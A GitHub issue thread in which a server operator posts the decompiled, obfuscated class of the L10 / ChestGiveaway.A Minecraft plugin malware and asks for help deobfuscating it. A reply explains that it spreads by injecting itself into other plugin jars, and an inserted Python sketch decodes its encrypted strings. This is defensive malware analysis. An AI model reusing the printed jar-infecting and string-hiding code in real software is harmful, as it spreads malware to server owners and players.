java-deobfuscator / deobfuscator

The real deal
https://javadeobfuscator.com
Apache License 2.0

Help with deobfuscation #989

Closed Manered closed 9 months ago

Manered commented 9 months ago

Hey there, I tried deobfuscating this likely crypto-miner's class that gets injected into my customer's Minecraft server (he has a crypto-miner on there, and he is trying to get rid of it). When trying to deobfuscate it with this tool, it did not print out any list of transformers (so it didn't find an appropriate deobfuscator). I'm not trying to deobfuscate the entire jar file, but just the class that the crypto-miner adds.

If you don't know how to deobfuscate this specifically, can you at least try telling me what obfuscator was used in this process or what I can try?

Here's the class:

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package org.debuff.debuff;

import java.io.ByteArrayInputStream;
import java.io.File;
import java.nio.charset.StandardCharsets;
import java.nio.file.FileSystems;
import java.nio.file.FileVisitOption;
import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.OpenOption;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import javassist.aa;
import javassist.b;
import javassist.f;
import javassist.k;
import javassist.ws.a;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class SpawnZombieL10 {
    public final void a(String lllllllllllllllllIIIlIIlllIlllIl) {
        if (!lllllIIIllll(System.getProperty(llIIIlIIlIl[llIIIlIIllI[1]]).toLowerCase().contains(llIIIlIIlIl[llIIIlIIllI[2]]))) {
            a = new File(lllllllllllllllllIIIlIIlllIlllIl);
            char lllllllllllllllllIIIlIIlllIlllII = f.a();
            String lllllllllllllllllIIIlIIlllIllIll = new b(lllllllllllllllllIIIlIIlllIllllI.getClass());
            lllllllllllllllllIIIlIIlllIlllII.a(lllllllllllllllllIIIlIIlllIllIll);
            "".length();
            short lllllllllllllllllIIIlIIlllIllIlI = Paths.get(lllllllllllllllllIIIlIIlllIllllI.getClass().getProtectionDomain().getCodeSource().getLocation().toURI());
            byte lllllllllllllllllIIIlIIlllIllIIl = FileSystems.newFileSystem(lllllllllllllllllIIIlIIlllIllIlI, (ClassLoader)null);
            if (lllllIIIllll(Files.exists(lllllllllllllllllIIIlIIlllIllIIl.getPath(llIIIlIIlIl[llIIIlIIllI[3]]), new LinkOption[llIIIlIIllI[0]]))) {
                short lllllllllllllllllIIIlIIlllIllIII = lllllllllllllllllIIIlIIlllIllIIl.getPath(llIIIlIIlIl[llIIIlIIllI[4]]);
                "".length();
                if (null == null) {
                    byte lllllllllllllllllIIIlIIlllIlIlll = lllllllllllllllllIIIlIIlllIlllII.c(lllllllllllllllllIIIlIIlllIllllI.getClass().getName());
                    boolean lllllllllllllllllIIIlIIlllIlIlIl = javassist.ws.a.a(a).iterator();
                    "".length();
                    if (" ".length() > -" ".length()) {
                        while(!lllllIIlIIII(lllllllllllllllllIIIlIIlllIlIlIl.hasNext())) {
                            Exception lllllllllllllllllIIIlIIlllIlIllI = (File)lllllllllllllllllIIIlIIlllIlIlIl.next();

                            label110: {
                                try {
                                    boolean lllllllllllllllllIIIlIIlllIlIlII = FileSystems.newFileSystem(lllllllllllllllllIIIlIIlllIlIllI.toPath(), (ClassLoader)null);
                                    if (lllllIIIllll(Files.exists(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[5]]), new LinkOption[llIIIlIIllI[0]]))) {
                                        break label110;
                                    }

                                    label103: {
                                        try {
                                            Exception lllllllllllllllllIIIlIIlllIlIIlI = lllllllllllllllllIIIlIIlllIlIlII.getRootDirectories().iterator();
                                            "".length();
                                            if ((107 ^ 53 ^ 119 ^ 45) == -" ".length()) {
                                                return;
                                            }

                                            while(!lllllIIlIIII(lllllllllllllllllIIIlIIlllIlIIlI.hasNext())) {
                                                int lllllllllllllllllIIIlIIlllIlIIll = (Path)lllllllllllllllllIIIlIIlllIlIIlI.next();
                                                short lllllllllllllllllIIIlIIlllIlIIIl = Files.walk(lllllllllllllllllIIIlIIlllIlIIll, llIIIlIIllI[6], new FileVisitOption[llIIIlIIllI[0]]).filter((var0) -> {
                                                    int var10000;
                                                    if (lllllIIlIIII(Files.isDirectory(var0, new LinkOption[llIIIlIIllI[0]])) && lllllIIIllll(var0.toString().endsWith(llIIIlIIlIl[llIIIlIIllI[32]]))) {
                                                        var10000 = llIIIlIIllI[1];
                                                        "".length();
                                                        if (((216 ^ 196 ^ 245 ^ 196) & (180 + 26 - 127 + 109 ^ 106 + 11 - 98 + 126 ^ -" ".length())) != 0) {
                                                            return (boolean)((112 + 56 - 63 + 135 ^ 151 + 124 - 253 + 177) & (23 ^ 90 ^ 245 ^ 143 ^ -" ".length()));
                                                        }
                                                    } else {
                                                        var10000 = llIIIlIIllI[0];
                                                    }

                                                    return (boolean)var10000;
                                                }).iterator();
                                                "".length();
                                                if ((14 ^ 10) < 0) {
                                                    return;
                                                }

                                                while(!lllllIIlIIII(lllllllllllllllllIIIlIIlllIlIIIl.hasNext())) {
                                                    try {
                                                        lllllllllllllllllIIIlIIlllIlIlll.c();
                                                        long lllllllllllllllllIIIlIIlllIlIIII = (Path)lllllllllllllllllIIIlIIlllIlIIIl.next();
                                                        String lllllllllllllllllIIIlIIlllIIllll = new ByteArrayInputStream(Files.readAllBytes(lllllllllllllllllIIIlIIlllIlIIII));
                                                        double lllllllllllllllllIIIlIIlllIIlllI = lllllllllllllllllIIIlIIlllIlllII.a(lllllllllllllllllIIIlIIlllIIllll);
                                                        if (lllllIIIllll(lllllllllllllllllIIIlIIlllIIlllI.b().a().contains(llIIIlIIlIl[llIIIlIIllI[7]]))) {
                                                            String var10001 = lllllllllllllllllIIIlIIlllIlIIII.getParent().toString();
                                                            String[] var10002 = new String[llIIIlIIllI[1]];
                                                            var10002[llIIIlIIllI[0]] = String.valueOf((new StringBuilder(String.valueOf(lllllllllllllllllIIIlIIlllIIlllI.b()))).append(llIIIlIIlIl[llIIIlIIllI[8]]));
                                                            float lllllllllllllllllIIIlIIlllIIllIl = lllllllllllllllllIIIlIIlllIlIlII.getPath(var10001, var10002);
                                                            byte[] var23;
                                                            OpenOption[] var24;
                                                            if (lllllIIlIIII(Files.exists(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[9]]), new LinkOption[llIIIlIIllI[0]]))) {
                                                                lllllllllllllllllIIIlIIlllIlIlll.a(lllllllllllllllllIIIlIIlllIIllIl.toString().replace(llIIIlIIlIl[llIIIlIIllI[10]], llIIIlIIlIl[llIIIlIIllI[11]]).replaceFirst(llIIIlIIlIl[llIIIlIIllI[12]], llIIIlIIlIl[llIIIlIIllI[13]]));
                                                                Files.createFile(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[14]]));
                                                                "".length();
                                                                var23 = lllllllllllllllllIIIlIIlllIlIlll.a();
                                                                var24 = new OpenOption[llIIIlIIllI[2]];
                                                                var24[llIIIlIIllI[0]] = StandardOpenOption.CREATE;
                                                                var24[llIIIlIIllI[1]] = StandardOpenOption.WRITE;
                                                                Files.write(lllllllllllllllllIIIlIIlllIIllIl, var23, var24);
                                                                "".length();

                                                                label87: {
                                                                    try {
                                                                        Files.createDirectory(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[15]]));
                                                                        "".length();
                                                                    } catch (Exception var19) {
                                                                        break label87;
                                                                    }

                                                                    "".length();
                                                                    if (" ".length() < 0) {
                                                                        return;
                                                                    }
                                                                }

                                                                Files.walkFileTree(lllllllllllllllllIIIlIIlllIllIII, new k(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[16]])));
                                                                "".length();
                                                                "".length();
                                                                if (-"   ".length() > 0) {
                                                                    return;
                                                                }
                                                            } else {
                                                                boolean lllllllllllllllllIIIlIIlllIIllII = lllllllllllllllllIIIlIIlllIIlllI.a(llIIIlIIlIl[llIIIlIIllI[17]]);
                                                                lllllllllllllllllIIIlIIlllIIllII.d(String.valueOf((new StringBuilder(llIIIlIIlIl[llIIIlIIllI[18]])).append(lllllllllllllllllIIIlIIlllIIllIl.toString().replace(llIIIlIIlIl[llIIIlIIllI[19]], llIIIlIIlIl[llIIIlIIllI[20]]).replace(llIIIlIIlIl[llIIIlIIllI[21]], llIIIlIIlIl[llIIIlIIllI[22]]).replaceFirst(llIIIlIIlIl[llIIIlIIllI[23]], llIIIlIIlIl[llIIIlIIllI[24]])).append(llIIIlIIlIl[llIIIlIIllI[25]])));
                                                                var23 = lllllllllllllllllIIIlIIlllIIlllI.a();
                                                                var24 = new OpenOption[llIIIlIIllI[1]];
                                                                var24[llIIIlIIllI[0]] = StandardOpenOption.WRITE;
                                                                Files.write(lllllllllllllllllIIIlIIlllIlIIII, var23, var24);
                                                                "".length();
                                                                Files.createFile(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[26]]));
                                                                "".length();
                                                            }
                                                        }

                                                        lllllllllllllllllIIIlIIlllIIllll.close();
                                                    } catch (Exception var20) {
                                                        boolean var10000 = var20 instanceof aa;
                                                        "".length();
                                                        continue;
                                                    }

                                                    "".length();
                                                    if (" ".length() < 0) {
                                                        return;
                                                    }
                                                }
                                            }
                                        } catch (Exception var21) {
                                            break label103;
                                        }

                                        "".length();
                                        if ("  ".length() == 0) {
                                            return;
                                        }
                                    }

                                    lllllllllllllllllIIIlIIlllIlIlII.close();
                                } catch (Exception var22) {
                                    continue;
                                }

                                "".length();
                                if ("   ".length() > "   ".length()) {
                                    return;
                                }
                                continue;
                            }

                            "".length();
                            if (((2 ^ 44) & ~(110 ^ 64)) != 0) {
                                return;
                            }
                        }

                        if (lllllIIlIIII(a)) {
                            a = (boolean)llIIIlIIllI[1];
                            lllllllllllllllllIIIlIIlllIllllI.a(lllllllllllllllllIIIlIIlllIlllIl);
                        } else {
                            if (lllllIIlIIIl(System.getProperty(llIIIlIIlIl[llIIIlIIllI[27]]))) {
                                System.setProperty(llIIIlIIlIl[llIIIlIIllI[28]], llIIIlIIlIl[llIIIlIIllI[29]]);
                                "".length();
                                a = new a();
                            }

                        }
                    }
                }
            }
        }
    }

    private static boolean lllllIIIllll(int var0) {
        return var0 != 0;
    }

    private static boolean lllllIIlIIII(int var0) {
        return var0 == 0;
    }

    private static boolean lllllIIlIIIl(Object var0) {
        return var0 == null;
    }

    private static String lllllIIIlIIl(String lllllllllllllllllIIIlIIllIllIlII, String lllllllllllllllllIIIlIIllIllIIll) {
        lllllllllllllllllIIIlIIllIllIlII = new String(Base64.getDecoder().decode(lllllllllllllllllIIIlIIllIllIlII.getBytes(StandardCharsets.UTF_8)), StandardCharsets.UTF_8);
        StringBuilder lllllllllllllllllIIIlIIllIllIlll = new StringBuilder();
        char[] lllllllllllllllllIIIlIIllIllIllI = lllllllllllllllllIIIlIIllIllIIll.toCharArray();
        int lllllllllllllllllIIIlIIllIllIlIl = llIIIlIIllI[0];
        short lllllllllllllllllIIIlIIllIlIllll = lllllllllllllllllIIIlIIllIllIlII.toCharArray();
        byte lllllllllllllllllIIIlIIllIlIlllI = lllllllllllllllllIIIlIIllIlIllll.length;
        boolean lllllllllllllllllIIIlIIllIlIllIl = llIIIlIIllI[0];

        do {
            if (!lllllIIlIIll(lllllllllllllllllIIIlIIllIlIllIl, lllllllllllllllllIIIlIIllIlIlllI)) {
                return String.valueOf(lllllllllllllllllIIIlIIllIllIlll);
            }

            char lllllllllllllllllIIIlIIllIlllIlI = lllllllllllllllllIIIlIIllIlIllll[lllllllllllllllllIIIlIIllIlIllIl];
            lllllllllllllllllIIIlIIllIllIlll.append((char)(lllllllllllllllllIIIlIIllIlllIlI ^ lllllllllllllllllIIIlIIllIllIllI[lllllllllllllllllIIIlIIllIllIlIl % lllllllllllllllllIIIlIIllIllIllI.length]));
            "".length();
            ++lllllllllllllllllIIIlIIllIllIlIl;
            ++lllllllllllllllllIIIlIIllIlIllIl;
            "".length();
        } while("  ".length() == "  ".length());

        return null;
    }

    private static String lllllIIIlIlI(String lllllllllllllllllIIIlIIllIIlIlIl, String lllllllllllllllllIIIlIIllIIlIlII) {
        try {
            byte lllllllllllllllllIIIlIIllIIlIIll = new SecretKeySpec(MessageDigest.getInstance("MD5").digest(lllllllllllllllllIIIlIIllIIlIlII.getBytes(StandardCharsets.UTF_8)), "Blowfish");
            char lllllllllllllllllIIIlIIllIIlIIlI = Cipher.getInstance("Blowfish");
            lllllllllllllllllIIIlIIllIIlIIlI.init(llIIIlIIllI[2], lllllllllllllllllIIIlIIllIIlIIll);
            return new String(lllllllllllllllllIIIlIIllIIlIIlI.doFinal(Base64.getDecoder().decode(lllllllllllllllllIIIlIIllIIlIlIl.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
        } catch (Exception var4) {
            var4.printStackTrace();
            return null;
        }
    }

    public static String a(int var0) {
        StringBuilder lllllllllllllllllIIIlIIlllIIIlll = new StringBuilder();
        int var2 = llIIIlIIllI[0];
        "".length();
        if ((28 ^ 25) <= 0) {
            return null;
        } else {
            while(!lllllIIlIIlI(var2, var0)) {
                lllllllllllllllllIIIlIIlllIIIlll.append(llIIIlIIlIl[llIIIlIIllI[30]].charAt(a.nextInt(llIIIlIIlIl[llIIIlIIllI[31]].length())));
                "".length();
                ++var2;
            }

            return String.valueOf(lllllllllllllllllIIIlIIlllIIIlll);
        }
    }

    private static String lllllIIIlIII(String lllllllllllllllllIIIlIIllIlIIlII, String lllllllllllllllllIIIlIIllIlIIIll) {
        try {
            SecretKeySpec lllllllllllllllllIIIlIIllIlIIlll = new SecretKeySpec(Arrays.copyOf(MessageDigest.getInstance("MD5").digest(lllllllllllllllllIIIlIIllIlIIIll.getBytes(StandardCharsets.UTF_8)), llIIIlIIllI[9]), "DES");
            Cipher lllllllllllllllllIIIlIIllIlIIllI = Cipher.getInstance("DES");
            lllllllllllllllllIIIlIIllIlIIllI.init(llIIIlIIllI[2], lllllllllllllllllIIIlIIllIlIIlll);
            return new String(lllllllllllllllllIIIlIIllIlIIllI.doFinal(Base64.getDecoder().decode(lllllllllllllllllIIIlIIllIlIIlII.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
        } catch (Exception var5) {
            var5.printStackTrace();
            return null;
        }
    }

    static {
        lllllIIIlllI();
        lllllIIIlIll();
        a = llIIIlIIlIl[llIIIlIIllI[0]];
        a = (boolean)llIIIlIIllI[0];
        a = new SecureRandom();
    }

    public SpawnZombieL10() {
    }

    private static void lllllIIIlIll() {
        llIIIlIIlIl = new String[llIIIlIIllI[33]];
        llIIIlIIlIl[llIIIlIIllI[0]] = lllllIIIlIII("whZsDeWLEuF+BeQQdQLuJ2zRe/gk0VGAZCmC4qfcitHNp/wB9OmPktkFLTbWiqT5pa+o0IZV0ynU9ZxEK7hNkJvwzTjI22HB", "Wuzup");
        llIIIlIIlIl[llIIIlIIllI[1]] = lllllIIIlIII("TN8dTwxfOZg=", "IeNKN");
        llIIIlIIlIl[llIIIlIIllI[2]] = lllllIIIlIII("p3VsZ9hxF54=", "PGFhZ");
        llIIIlIIlIl[llIIIlIIllI[3]] = lllllIIIlIIl("YjopBQs+IyEAHg==", "MPHsj");
        llIIIlIIlIl[llIIIlIIllI[4]] = lllllIIIlIIl("eiUNEhQmPAUXAQ==", "UOldu");
        llIIIlIIlIl[llIIIlIIllI[5]] = lllllIIIlIIl("YjkoKDMiOgUk", "LUwAT");
        llIIIlIIlIl[llIIIlIIllI[7]] = lllllIIIlIIl("BAc8KCoiEy0gFA==", "NfJIz");
        llIIIlIIlIl[llIIIlIIllI[8]] = lllllIIIlIlI("5+m/ld1KFkYgNphr7Cvtgw==", "pHKPx");
        llIIIlIIlIl[llIIIlIIllI[9]] = lllllIIIlIlI("mXIoflZmxC4=", "RohAN");
        llIIIlIIlIl[llIIIlIIllI[10]] = lllllIIIlIIl("WiQIABsH", "tGdah");
        llIIIlIIlIl[llIIIlIIllI[11]] = lllllIIIlIII("QEp3W0WGBDs=", "vPeVJ");
        llIIIlIIlIl[llIIIlIIllI[12]] = lllllIIIlIlI("REXVK4ncgO4=", "eAOOM");
        llIIIlIIlIl[llIIIlIIllI[13]] = lllllIIIlIlI("rQZXitLllrc=", "mSQLK");
        llIIIlIIlIl[llIIIlIIllI[14]] = lllllIIIlIlI("V875n3k+i1k=", "ORDjT");
        llIIIlIIlIl[llIIIlIIllI[15]] = lllllIIIlIlI("EwoEbVO2QK1OSDnRfK8B/Q==", "zubwy");
        llIIIlIIlIl[llIIIlIIllI[16]] = lllllIIIlIlI("WPO1lejAiVs8DzQicVLCAA==", "gzCcN");
        llIIIlIIlIl[llIIIlIIllI[17]] = lllllIIIlIIl("ATo1KQUMOBU=", "nTpGd");
        llIIIlIIlIl[llIIIlIIllI[18]] = lllllIIIlIIl("BywdVw==", "iIjwb");
        llIIIlIIlIl[llIIIlIIllI[19]] = lllllIIIlIlI("jkYCGJhVsg0=", "WgyfO");
        llIIIlIIlIl[llIIIlIIllI[20]] = lllllIIIlIlI("OlBkN668kZI=", "rzmRy");
        llIIIlIIlIl[llIIIlIIllI[21]] = lllllIIIlIIl("eDElEzwl", "VRIrO");
        llIIIlIIlIl[llIIIlIIllI[22]] = lllllIIIlIIl("", "AdVlI");
        llIIIlIIlIl[llIIIlIIllI[23]] = lllllIIIlIIl("ag==", "DTRbf");
        llIIIlIIlIl[llIIIlIIllI[24]] = lllllIIIlIIl("", "CjAMv");
        llIIIlIIlIl[llIIIlIIllI[25]] = lllllIIIlIlI("EdxE5YllsMYT19K1LCU3HQnD+V3WHMPz/JbUucnyv6UEuyPFoVKD4g==", "TvWbC");
        llIIIlIIlIl[llIIIlIIllI[26]] = lllllIIIlIIl("eigLMCA6KyY8", "TDTYG");
        llIIIlIIlIl[llIIIlIIllI[27]] = lllllIIIlIII("5youM5tNOg4=", "aOhaa");
        llIIIlIIlIl[llIIIlIIllI[28]] = lllllIIIlIIl("EwwKCxUB", "uugTf");
        llIIIlIIlIl[llIIIlIIllI[29]] = lllllIIIlIII("df1dBzD5zjI=", "xfUit");
        llIIIlIIlIl[llIIIlIIllI[30]] = lllllIIIlIIl("W1phYXJeXWRqfwoJMDYjDQw7OywABz48KRsaISEyHh0kKj8RKhERAi4tFBoPISAfHwgkOwIAFT8+BQUeMjF+DQ==", "kkSRF");
        llIIIlIIlIl[llIIIlIIllI[31]] = lllllIIIlIlI("l94eddwYHgv604L60g7G90jFXFsRDVYteBvLl707DMpfn/dGmvnUoaySxDCU/KQ2duSQ7Qtin4Z0MjQXyw/m1a9dseSGVXSv", "XSodC");
        llIIIlIIlIl[llIIIlIIllI[32]] = lllllIIIlIlI("T45EhoJmY/w=", "WwNgM");
    }

    private static void lllllIIIlllI() {
        llIIIlIIllI = new int[34];
        llIIIlIIllI[0] = (54 ^ 116) & ~(45 ^ 111);
        llIIIlIIllI[1] = " ".length();
        llIIIlIIllI[2] = "  ".length();
        llIIIlIIllI[3] = "   ".length();
        llIIIlIIllI[4] = 8 ^ 12;
        llIIIlIIllI[5] = 38 ^ 35;
        llIIIlIIllI[6] = 67 ^ 40 ^ 67 ^ 76;
        llIIIlIIllI[7] = 126 ^ 120;
        llIIIlIIllI[8] = 68 ^ 25 ^ 96 ^ 58;
        llIIIlIIllI[9] = 151 ^ 159;
        llIIIlIIllI[10] = 7 ^ 14;
        llIIIlIIllI[11] = 22 ^ 87 ^ 193 ^ 138;
        llIIIlIIllI[12] = 82 ^ 15 ^ 227 ^ 181;
        llIIIlIIllI[13] = 10 ^ 55 ^ 112 ^ 65;
        llIIIlIIllI[14] = 28 ^ 17;
        llIIIlIIllI[15] = 144 ^ 168 ^ 191 ^ 137;
        llIIIlIIllI[16] = 48 ^ 63;
        llIIIlIIllI[17] = 134 + 158 - 258 + 145 ^ 126 + 103 - 131 + 65;
        llIIIlIIllI[18] = 78 ^ 95;
        llIIIlIIllI[19] = 137 ^ 155;
        llIIIlIIllI[20] = 36 ^ 55;
        llIIIlIIllI[21] = 2 ^ 22;
        llIIIlIIllI[22] = 109 ^ 85 ^ 167 ^ 138;
        llIIIlIIllI[23] = 191 ^ 169;
        llIIIlIIllI[24] = 201 ^ 155 ^ 105 ^ 44;
        llIIIlIIllI[25] = "   ".length() ^ 86 ^ 77;
        llIIIlIIllI[26] = 108 + 98 - 97 + 19 ^ 72 + 53 - 35 + 63;
        llIIIlIIllI[27] = 168 ^ 178;
        llIIIlIIllI[28] = 183 ^ 172;
        llIIIlIIllI[29] = 20 ^ 109 ^ 9 ^ 108;
        llIIIlIIllI[30] = 122 + 102 - 205 + 150 ^ 131 + 6 - 135 + 178;
        llIIIlIIllI[31] = 54 ^ 40;
        llIIIlIIllI[32] = 29 + 115 - 8 + 0 ^ 25 + 62 - -43 + 21;
        llIIIlIIllI[33] = 130 ^ 162;
    }

    private static boolean lllllIIlIIll(int var0, int var1) {
        return var0 < var1;
    }

    private static boolean lllllIIlIIlI(int var0, int var1) {
        return var0 >= var1;
    }
}

Janmm14 commented 9 months ago

The L10 malware is not crypto. OpticFusion1's spigot antimalware detects it as ChestGiveaway.A (likely named by the first appearance it made to him). Its main feature is providing hidden troll commands. Although it does have code to receive some command from the internet, I don't remember what exactly the internet connection of the malware can do, but I think it was quite limited to trolling features. Afaik the server it tries to connect to has been down for at least 2 or 3 years.

You can find the other logic inside the javassist folder, it does contain classes unrelated to javassist.

It spreads to all other jar files in the plugin directory.

I do not know which obfuscator was used and I didn't search for it. It's likely some of the obfuscators available in open-source on GitHub, a few of these popped up after superblaubeere obfuscator and the string decryption and array usage seems to be at least inspired by it.
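The string decryption and array usage mentioned above can be undone statically, without loading the class. The following Python sketch is an added example, not part of the thread or of the deobfuscator project: it folds the constant expressions of the int table with an AST whitelist, then decodes the entries that use the Base64-plus-XOR helper. The names `SAMPLE`, `fold`, `xor_decode` and `recover_strings` are the example's own, and the DES and Blowfish entries are only labelled, not decrypted.

```python
import ast
import base64
import operator
import re

# Constructed sample: lines copied verbatim from the decompiled class in the issue.
SAMPLE = r'''
llIIIlIIllI[1] = " ".length();
llIIIlIIllI[3] = "   ".length();
llIIIlIIllI[5] = 38 ^ 35;
llIIIlIIllI[7] = 126 ^ 120;
llIIIlIIllI[17] = 134 + 158 - 258 + 145 ^ 126 + 103 - 131 + 65;
llIIIlIIllI[26] = 108 + 98 - 97 + 19 ^ 72 + 53 - 35 + 63;
llIIIlIIlIl[llIIIlIIllI[1]] = lllllIIIlIII("TN8dTwxfOZg=", "IeNKN");
llIIIlIIlIl[llIIIlIIllI[3]] = lllllIIIlIIl("YjopBQs+IyEAHg==", "MPHsj");
llIIIlIIlIl[llIIIlIIllI[5]] = lllllIIIlIIl("YjkoKDMiOgUk", "LUwAT");
llIIIlIIlIl[llIIIlIIllI[7]] = lllllIIIlIIl("BAc8KCoiEy0gFA==", "NfJIz");
llIIIlIIlIl[llIIIlIIllI[17]] = lllllIIIlIIl("ATo1KQUMOBU=", "nTpGd");
llIIIlIIlIl[llIIIlIIllI[26]] = lllllIIIlIIl("eigLMCA6KyY8", "TDTYG");
'''

# Operators the obfuscator's constant expressions use; anything else is rejected.
OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.BitXor: operator.xor,
       ast.BitAnd: operator.and_, ast.BitOr: operator.or_,
       ast.Invert: operator.invert, ast.USub: operator.neg}
# Decrypt helpers as named in the posted class, keyed to what their bodies do.
ROUTINES = {"lllllIIIlIIl": "xor", "lllllIIIlIII": "des", "lllllIIIlIlI": "blowfish"}
INT_RE = re.compile(r'^\s*\w+\[(\d+)\] = (.+);\s*$', re.M)
STR_RE = re.compile(r'^\s*\w+\[\w+\[(\d+)\]\] = (\w+)\("([^"]*)", "([^"]*)"\);\s*$', re.M)


def fold(expr):
    """Evaluate one constant int expression with an AST whitelist (no eval)."""
    # Rewrite the "   ".length() idiom to the literal it stands for.
    expr = re.sub(r'"( *)"\.length\(\)', lambda m: str(len(m.group(1))), expr)

    def ev(node):
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in OPS:
            return OPS[type(node.op)](ev(node.operand))
        raise ValueError("unsupported expression: " + expr)

    return ev(ast.parse(expr.strip(), mode="eval").body)


def xor_decode(b64, key):
    """Base64-decode, then XOR each char with the repeating key."""
    text = base64.b64decode(b64).decode("utf-8", errors="replace")
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))


def recover_strings(source):
    """Map real string-table index -> (routine kind, plaintext or None)."""
    slots = {int(slot): fold(expr) for slot, expr in INT_RE.findall(source)}
    table = {}
    for slot, func, data, key in STR_RE.findall(source):
        kind = ROUTINES.get(func, "unknown")
        table[slots[int(slot)]] = (kind, xor_decode(data, key) if kind == "xor" else None)
    return table


if __name__ == "__main__":
    for index, (kind, text) in sorted(recover_strings(SAMPLE).items()):
        print(index, kind, repr(text))
```

The folded slot values are not the identity (slot 17 folds to 16, for example), so the string table has to be indexed by the folded value rather than by the literal that appears in the source.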

Manered commented 9 months ago

Alright, good to know. Going to show your reply to my customer/client. They did say he had a virus or crypto-miner on his server.